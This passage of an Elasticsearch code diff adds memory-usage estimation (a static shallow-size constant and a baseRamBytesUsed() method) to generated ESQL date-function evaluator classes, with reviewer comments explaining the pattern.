*/ public final class DateDiffConstantNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffConstantNanosMillisEvaluator.class); + private final Source source; private final DateDiff.Part datePartFieldUnit; @@ -63,6 +66,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += startTimestampNanos.baseRamBytesUsed(); + baseRamBytesUsed += endTimestampMillis.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, LongBlock startTimestampNanosBlock, LongBlock endTimestampMillisBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisEvaluator.java index bf938f135b6fa..ad458e5bd92ed 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateDiffMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator unit; @@ -72,6 +75,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += unit.baseRamBytesUsed(); + baseRamBytesUsed += startTimestamp.baseRamBytesUsed(); + baseRamBytesUsed += endTimestamp.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock unitBlock, LongBlock startTimestampBlock, LongBlock endTimestampBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisNanosEvaluator.java index 2e4f71d8636b4..d1c37cddd3810 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffMillisNanosEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateDiffMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator unit; @@ -72,6 +75,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += unit.baseRamBytesUsed(); + baseRamBytesUsed += startTimestampMillis.baseRamBytesUsed(); + baseRamBytesUsed += endTimestampNanos.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock unitBlock, LongBlock startTimestampMillisBlock, LongBlock endTimestampNanosBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosEvaluator.java index 1fb8e2c744cd3..87dd22863c1cb 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateDiffNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator unit; @@ -72,6 +75,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += unit.baseRamBytesUsed(); + baseRamBytesUsed += startTimestamp.baseRamBytesUsed(); + baseRamBytesUsed += endTimestamp.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock unitBlock, LongBlock startTimestampBlock, LongBlock endTimestampBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosMillisEvaluator.java index f08424a09d1b4..d641996c4128e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffNanosMillisEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateDiffNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator unit; @@ -72,6 +75,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += unit.baseRamBytesUsed(); + baseRamBytesUsed += startTimestampNanos.baseRamBytesUsed(); + baseRamBytesUsed += endTimestampMillis.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock unitBlock, LongBlock startTimestampNanosBlock, LongBlock endTimestampMillisBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantMillisEvaluator.java index fe283a95f3c2e..64ba4c666c77a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantMillisEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.time.ZoneId; import java.time.temporal.ChronoField; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
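[Reviewer's note — not part of the patch.] One nuance worth stating: RamUsageEstimator.shallowSizeOfInstance counts a reference field as a single pointer slot and never follows it, so configuration held directly by the Constant variants above (a Rounding, DateFormatter, or ZoneId) does not enter the estimate; only fields that are themselves evaluators are walked, because the generator emits an explicit baseRamBytesUsed() call per child. A sketch with illustrative names, reusing SketchEvaluator from the earlier note:

    final class ConstantishSketch {
        private static final long BASE_RAM_BYTES_USED =
            RamUsageEstimator.shallowSizeOfInstance(ConstantishSketch.class);

        private final Object formatter;    // plain config: one reference slot, referent not counted
        private final SketchEvaluator val; // child evaluator: walked explicitly below

        ConstantishSketch(Object formatter, SketchEvaluator val) {
            this.formatter = formatter;
            this.val = val;
        }

        long baseRamBytesUsed() {
            return BASE_RAM_BYTES_USED + val.baseRamBytesUsed();
        }
    }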
*/ public final class DateExtractConstantMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateExtractConstantMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator value; @@ -56,6 +59,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += value.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valueBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantNanosEvaluator.java index 35bca67388d78..51e97f41af550 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractConstantNanosEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.time.ZoneId; import java.time.temporal.ChronoField; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateExtractConstantNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateExtractConstantNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator value; @@ -56,6 +59,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += value.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valueBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractMillisEvaluator.java index dcb8a543f5c35..eb48145360f95 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractMillisEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.time.ZoneId; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateExtractMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateExtractMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator value; @@ -64,6 +67,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += value.baseRamBytesUsed(); + baseRamBytesUsed += chronoField.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valueBlock, BytesRefBlock chronoFieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { BytesRef chronoFieldScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractNanosEvaluator.java index 6b961447df830..ab14429375599 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateExtractNanosEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.time.ZoneId; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateExtractNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateExtractNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator value; @@ -64,6 +67,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += value.baseRamBytesUsed(); + baseRamBytesUsed += chronoField.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valueBlock, BytesRefBlock chronoFieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { BytesRef chronoFieldScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisConstantEvaluator.java index 77aa06913c565..dd672f98aae47 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisConstantEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.time.DateFormatter; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateFormatMillisConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateFormatMillisConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisEvaluator.java index 428b932df3978..ea91a79961fb3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatMillisEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.Locale; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateFormatMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateFormatMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -64,6 +67,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += formatter.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, LongBlock valBlock, BytesRefBlock formatterBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef formatterScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosConstantEvaluator.java index e1a5dd3272900..86c74e73f9a57 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosConstantEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.time.DateFormatter; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -25,6 +26,8 @@ * This class is generated. 
Edit {@code EvaluatorImplementer} instead. */ public final class DateFormatNanosConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateFormatNanosConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, LongBlock valBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosEvaluator.java index 8d27a1aaeede2..313a46075f040 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateFormatNanosEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.Locale; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateFormatNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateFormatNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -64,6 +67,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += formatter.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, LongBlock valBlock, BytesRefBlock formatterBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef formatterScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseConstantEvaluator.java index 4f792b640f560..a4f6efd4d7693 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseConstantEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.time.DateFormatter; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateParseConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateParseConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock valBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseEvaluator.java index 752cc72971fe8..fada750284ad3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateParseEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateParseEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateParseEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += formatter.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock valBlock, BytesRefBlock formatterBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDateNanosEvaluator.java index 1b21c2fc872d5..31cadcc807848 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDateNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDateNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.Rounding; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class DateTruncDateNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateTruncDateNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator fieldVal; @@ -52,6 +55,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += fieldVal.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldValBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDatetimeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDatetimeEvaluator.java index 96a6c192f53cf..9c55385329608 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDatetimeEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTruncDatetimeEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.Rounding; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateTruncDatetimeEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateTruncDatetimeEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator fieldVal; @@ -52,6 +55,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += fieldVal.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldValBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameMillisEvaluator.java new file mode 100644 index 0000000000000..82ef56821c8ef --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DayNameMillisEvaluator.java @@ -0,0 +1,149 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.date; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import java.time.ZoneId; +import java.util.Locale; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.compute.data.BytesRefVector; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link 